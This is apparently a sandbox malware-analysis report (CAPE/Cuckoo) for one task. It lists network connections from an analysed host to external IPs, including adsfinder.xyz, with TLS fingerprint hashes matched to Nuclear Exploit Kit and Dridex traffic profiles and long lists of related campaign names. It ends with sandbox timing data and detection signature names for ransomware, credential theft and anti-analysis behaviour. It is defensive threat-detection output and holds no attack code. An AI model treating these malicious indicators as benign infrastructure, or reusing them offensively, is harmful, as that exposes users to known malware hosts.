10.0.90.175 49387 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49389 185.158.249.39 adsfinder.xyz 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49325 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49326 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49327 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49328 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49329 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49331 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49332 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49333 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49334 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49336 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49337 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49338 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49339 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49340 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49342 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49343 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49344 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49345 185.212.47.167 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49369 198.54.115.33 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49395 198.54.115.33 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49362 198.54.125.57 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49390 198.54.125.57 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49373 68.65.122.52 443 74927e242d6c3febf8cb9cab10a7f889 Test FP: Dridex Malware, Malware Test FP: dhl-malspam-traffic, kovter-malspam-traffic, ups-malspam-traffic, fedex-malspam-sends-kovter, usps-malspam-traffic-1-of-2, kovter-nemucodaes-malspam-traffic, cerber-kovter-malspam-traffic, dridex-malspam-traffic, kovter-nemucod-malspam-traffic, usps-malspam-traffic-2nd-run, ups-themed-kovter-malspam-traffic, fedex-malspam-traffic, unidentified-campaign-rig-ek-sends-deloader, booking-malspam-dridex-traffic, dridex-confirmation-letter-dridex-traffic, upatre-malspam-infection-traffic, upatre-dyre-infection, kovter-locky-malspam-traffic
10.0.90.175 49206 72.21.81.200 iecvlist.microsoft.com 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
10.0.90.175 49207 72.21.81.200 iecvlist.microsoft.com 443 4d7a28d6f2263ed61de88ca66eb011e3 Test FP: Nuclear Exploit Kit, Malware Test FP: brazil-malspam-pushes-banload, eitest-campaign-hoeflertext-popup-traffic, parking-service-malspam-traffic-2nd-run, globeimposter-malspam-traffic, fake-font-update-for-chrome, eitest-tech-support-scam-after-canadoodles.com, rig-ek-sends-qbot-traffic, neutrino-ek-traffic, upatre-dyre-malspam-traffic, cerber-kovter-malspam-traffic, pseudodarkleech-rig-ek-sends-cerber-ransomware, necurs-botnet-malspam-pushes-globeimposter, income-report-malspam-traffic, angler-ek-sends-cryptowall-3.0-traffic, dridex-confirmation-letter-dridex-traffic, contract-malspam-traffic, angler-ek-traffic, malspam-pushing-formbook-info-stealer, kovter-locky-malspam-traffic, portuguese-malspam-traffic, fake-av-page-after-viewing-mitchandgina.com, zeuspandabanker-malspam-traffic, magnitude-ek-traffic, necurs-botnet-malspam-traffic, eitest-campaign-fake-av-page-traffic, java-update-traffic-edited, necurs-botnet-malspam-pushes-globeimposter-traffic, necurs-botnet-malspam-traffic-2nd-run, mole-ransomware-malspam-2nd-attempt-on-a-physical-host, usps-malspam-traffic-2-of-2-panda-banker-only, loki-bot-malspam-traffic, boleto-malspam-infection-from-pdf-attachment, nuclear-ek-from-windigo-group-traffic, brazil-boleto-malspam-traffic, pseudo-darkleech-angler-ek-traffic, neutrino-ek-sends-teslacrypt-2.0-traffic, japanese-malspam-traffic, malspam-email-infected-vm-traffic, portuguese-invoice-malspam-traffic, brazil-malspam-traffic, compromised-site-generates-angler-and-rig-ek-traffic, flashpack-ek-traffic, chanitor-vawtrak-traffic, whatsapp-malspam-traffic, necurs-botnet-malspam-traffic-1st-run, necurs-botnet-malspam-pushes-globeimposter-ransomware, angler-ek-and-ransomware-traffic, eitest-hoeflertext-popup-sends-netsupport-manager-rat, fake-hoeflertext-font-pushes-netsupport-manager-rat, ups-themed-kovter-malspam-traffic, chanitor-vawtrak-malspam-traffic, nuclear-ek-from-my-infected-vm, fake-flash-player-installs-coinminer-malware, malspam-pushing-smoke-loader, brazil-detran-malspam-traffic, brazil-malspam-traffic-example, eitest-campaign-hoeflertext-popup-sends-netsupport-manager-rat, rig-ek-sends-zbot, tt-copy-malspam-traffic, operation-windigo-nuclear-ek-traffic, fiesta-ek-infection-traffic, eitest-angler-ek-sends-panda-banker, emotet-malspam-traffic, nuclear-ek-traffic, eitest-angler-ek-traffic, usps-malspam-sends-exe-file-with-post-infection-traffic, fedex-malspam-traffic, malspam-traffic, boleto-malspam-link-from-email-full-infection, angler-ek-delivers-ransomware, emotet-and-zeus-panda-banker-traffic, hancitor-malspam-traffic, boleto-malspam-traffic, angler-and-magnitude-ek-traffic, brazilian-malspam-traffic
Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.

Comments



No comments posted

Processing ( 5.813 seconds )

  • 2.949 CAPE
  • 2.857 NetworkAnalysis
  • 0.005 AnalysisInfo
  • 0.001 BehaviorAnalysis
  • 0.001 Debug

Signatures ( 0.052 seconds )

  • 0.008 ransomware_files
  • 0.007 antiav_detectreg
  • 0.005 recon_checkip
  • 0.003 antiav_detectfile
  • 0.003 infostealer_ftp
  • 0.003 ransomware_extensions
  • 0.002 persistence_autorun
  • 0.002 browser_security
  • 0.002 infostealer_bitcoin
  • 0.002 infostealer_im
  • 0.002 network_doh
  • 0.002 network_torgateway
  • 0.001 tinba_behavior
  • 0.001 rat_nanocore
  • 0.001 cerber_behavior
  • 0.001 antianalysis_detectfile
  • 0.001 antianalysis_detectreg
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vbox_keys
  • 0.001 geodo_banking_trojan
  • 0.001 disables_browser_warn
  • 0.001 infostealer_mail
  • 0.001 ie_martian_children

Reporting ( 0.0 seconds )

Task ID 94107
Mongo ID 5d9c44412896bfeded6fac23
Cuckoo release 1.3-CAPE
Delete